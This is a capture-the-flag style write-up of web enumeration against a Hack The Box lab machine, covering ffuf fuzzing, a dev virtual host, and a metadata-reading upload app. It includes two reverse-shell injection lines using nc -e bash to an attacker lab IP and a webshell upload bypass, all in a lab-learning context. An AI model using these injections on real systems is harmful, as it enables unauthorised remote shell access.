InfoSec LAB

Meta_Web

Created: 5 min read

Web

Nmap discovered a web server on the target port 80 The running service is Apache httpd

The Nmap scan also revealed a redirection to a domain; artcorp.htb

The domain information has been appended to the /etc/hosts file on Kali for local DNS resolution

Webroot It claims to be a website for a software development company The website itself appears to be in the development as well

Scrolling down, I see an announcement regarding a product, “MetaView”, being nearly ready for launch and its in the testing phase.

The Our Team section contains 3 potential users

Fuzzing

┌──(kali㉿kali)-[~/archive/htb/labs/meta]
└─$ ffuf -c -w /usr/share/wordlists/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt -u http://artcorp.htb/FUZZ -ic -e .txt,.php,.html 
________________________________________________
 :: Method           : GET
 :: URL              : http://artcorp.htb/FUZZ
 :: Wordlist         : FUZZ: /usr/share/wordlists/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt
 :: Extensions       : .txt .php .html 
 :: Follow redirects : false
 :: Calibration      : false
 :: Timeout          : 10
 :: Threads          : 40
 :: Matcher          : Response status: 200,204,301,302,307,401,403,405,500
________________________________________________
index.html              [Status: 200, Size: 4427, Words: 1663, Lines: 87, Duration: 584ms]
assets                  [Status: 301, Size: 234, Words: 14, Lines: 8, Duration: 94ms]
css                     [Status: 301, Size: 231, Words: 14, Lines: 8, Duration: 93ms]

ffuf returned nothing as far as the wordlist covers. It may be just a static page.

Sub-domain / virtual host discovery

┌──(kali㉿kali)-[~/archive/htb/labs]
└─$ ffuf -c -w /usr/share/wordlists/seclists/discovery/dns/subdomains-top1million-110000.txt -u http://$IP/ -H 'Host: FUZZ.artcorp.htb' -fc 301
________________________________________________
 
 :: Method           : GET
 :: URL              : http://10.10.11.140/
 :: Wordlist         : FUZZ: /usr/share/wordlists/seclists/Discovery/DNS/subdomains-top1million-110000.txt
 :: Header           : Host: FUZZ.artcorp.htb
 :: Follow redirects : false
 :: Calibration      : false
 :: Timeout          : 10
 :: Threads          : 40
 :: Matcher          : Response status: 200,204,301,302,307,401,403,405,500
 :: Filter           : Response status: 301
________________________________________________
dev01                   [status: 200, Size: 247, Words: 16, Lines: 10, Duration: 95ms]
:: Progress: [114441/114441] :: Job [1/1] :: 422 req/sec :: Duration: [0:04:36] :: Errors: 0 ::

ffuf found a virtual host located at dev01.artcorp.htb

It’s been appended to the /etc/hosts file on Kali for local DNS resolution

dev01.artcorp.htb

Webroot of dev01.artcorp.htb While the index page claims to be a dev environment, I do see that it’s written in PHP

The button points to /metaview/

There is also a note, Only applications ready to be tested are listed

Fuzzing

┌──(kali㉿kali)-[~/archive/htb/labs/meta]
└─$ ffuf -c -w /usr/share/wordlists/seclists/discovery/web-content/directory-list-2.3-medium.txt -u http://dev01.artcorp.htb/FUZZ -ic -e .txt,.php,.html 
________________________________________________
 :: Method           : GET
 :: URL              : http://dev01.artcorp.htb/FUZZ
 :: Wordlist         : FUZZ: /usr/share/wordlists/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt
 :: Extensions       : .txt .php .html 
 :: Follow redirects : false
 :: Calibration      : false
 :: Timeout          : 10
 :: Threads          : 40
 :: Matcher          : Response status: 200,204,301,302,307,401,403,405,500
________________________________________________
index.php               [status: 200, Size: 247, Words: 16, Lines: 10, Duration: 5082ms]
server-status           [status: 403, Size: 199, Words: 14, Lines: 8, Duration: 94ms]

ffuf returned nothing.

MetaView

The MetaView application at the /metaview/index.php file displays metadata about the uploaded file It must be going through the metadata of the uploaded file in order to do that. It might be possible to inject codes into filename and conduct the arbitrary file upload to get code execution

First, I need to evaluate how the application behaves

I will just upload a jpg file

It send out a POST request to the /metaview/index.php file itself The parameter is imageUpload

Then the app response with the metadata of the uploaded file as expected. It’s performing a file read operation. This could be from the direct PHP functions or embedded OS commands

The output appears to be very similar to that of exiftool as if only the highlighted portion are displayed If it is the case that the backend is using exiftool to read metadata, it is OS command, therefore it could be vulnerable to OS command injection

Attempting to upload a PHP webshell fails. PHP extension is likely blacklisted

Changing the extension to .php.jpg doesn’t work either. The filter might be checking the MIME type

┌──(kali㉿kali)-[~/archive/htb/labs/meta]
└─$ nano webshell.php.jpg 
┌──(kali㉿kali)-[~/archive/htb/labs/meta]
└─$ hexeditor webshell.php.jpg
┌──(kali㉿kali)-[~/archive/htb/labs/meta]
└─$ file webshell.php.jpg 
webshell.php.jpg: JPEG image data

So I appended a prefix of 4 characters to the file and edited to make it look like a jpg file

It worked this time. The file was successfully uploaded. This confirms the presence of MIME filter. However, the response only return 3 attributes of the metadata instead of the full 12 attributes That might be due to that fact that the file is a PHP webshell and doesn’t have those attribute in the first place

There are few things that I learned so far

  • Direct OS command injection through the filename doesn’t work;
    • test.jpg; nc 10.10.14.3 9999 -e bash
  • Injecting PHP codes into the Comment attribute and have the web app execute it, but it didn’t work
    • exiftool -Comment='system("nc 10.10.14.3 9999 -e bash");' test.jpg

Fuzzing

┌──(kali㉿kali)-[~/archive/htb/labs/meta]
└─$ ffuf -c -w /usr/share/wordlists/seclists/discovery/web-content/directory-list-2.3-medium.txt -u http://dev01.artcorp.htb/metaview/FUZZ -ic -e .txt,.php,.html
________________________________________________
 :: Method           : GET
 :: URL              : http://dev01.artcorp.htb/metaview/FUZZ
 :: Wordlist         : FUZZ: /usr/share/wordlists/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt
 :: Extensions       : .txt .php .html 
 :: Follow redirects : false
 :: Calibration      : false
 :: Timeout          : 10
 :: Threads          : 40
 :: Matcher          : Response status: 200,204,301,302,307,401,403,405,500
________________________________________________
index.php               [status: 200, Size: 1404, Words: 397, Lines: 34, Duration: 96ms]
uploads                 [status: 301, Size: 250, Words: 14, Lines: 8, Duration: 93ms]
assets                  [status: 301, Size: 249, Words: 14, Lines: 8, Duration: 93ms]
css                     [status: 301, Size: 246, Words: 14, Lines: 8, Duration: 92ms]
lib                     [status: 301, Size: 246, Words: 14, Lines: 8, Duration: 94ms]
vendor                  [status: 301, Size: 249, Words: 14, Lines: 8, Duration: 93ms]

The /metaview/uploads/ directory must be the place where the web app is storing uploaded files

I cannot locate the uploaded file; test.jpg at the /metaview/uploads/ directory It’s entirely possible that the web app is also renaming the uploaded files and I have no way of knowing that without fuzzing for hours.

I need to look elsewhere. I remember that the web app might be using exiftool in the backend.

Vulnerability

Googling for exiftool’s vulnerabilities and exploits shows one at the top; [[Meta_CVE-2021-22204#CVE-2021-22204|CVE-2021-22204]] Although I have no way of knowing if the web app is using the vulnerable version of exiftool, I can still give it a shot

Interactive Graph View

Backlinks